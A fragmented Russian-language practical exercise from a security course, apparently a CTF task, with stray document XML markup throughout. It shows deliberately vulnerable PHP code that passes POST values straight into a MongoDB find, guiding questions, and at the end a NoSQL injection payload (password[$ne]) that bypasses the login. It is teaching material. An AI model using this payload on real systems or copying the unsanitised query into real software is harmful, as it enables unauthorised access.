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Лекция 7 практика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 приложение. Расположенное по адресу: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://bakery.p.myctf.ru/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Код приложения таков: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(isset($_POST['login']) &amp;&amp; isset($_POST['password']))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$collection = $db-&gt;users;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$cursor = $collection-&gt;find(array("login" =&gt; $_POST['login'], "password" =&gt; $_POST['password']));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($cursor-&gt;count() &gt; 0) {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&lt;h1&gt;Flag: XXXX&lt;/h1&gt;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&lt;?php } else echo "Wrong credentials";}  ?&gt;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Какую роль выполняет строка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$collection-&gt;find(array("login" =&gt; $_POST['login'], "password" =&gt; $_POST['password']))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В каком случае вы получите положительное выполнение выражения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$cursor-&gt;count() &gt; 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Каким запросом передаются параметры на сайте?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Все запросы в MongoDB должны быть в формате JSON, где передаются массивы параметров и значений. Драйвер MongoDB представляет собой компонент, преобразующий массив к формату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Запрос, заполненный значениями, будет передаваться в MongoDB в следующем виде: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find( {username: 'barry',Password:'jimmypage'})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4) Рассмотрите следующую идею:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">При каком еще условии будет выполняться find?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find(array("login" =&gt; $_POST['login'], "password" =&gt; $_POST['password']))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обратитесь к мануалу mongodb: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https://docs.mongodb.com/manual/reference/operator/query/ne/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{field: {$ne: value}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6) в качестве значения параметра вам нужно получить массив. Сделать в HTTP это можно следующим образом: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]=</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d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итоге переменная примет вид:</w:t>
        <w:br w:type="textWrapping"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array(1) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  ["</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff000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"]=&gt;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  array(1) {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    ["</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr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"]=&gt;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    string(x) "</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d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А в строке кода php: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find( { ... </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff000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: {</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0000ff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color w:val="38761d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  <w:t xml:space="preserve">}   ….  })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Используя мануал из п.5 попробуйте выполнить инъекцию. Пройдите все шаги, указанные в пунктах выше и запишите свои значения. Покажите полученный результат.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login=admin&amp;password[$ne]=123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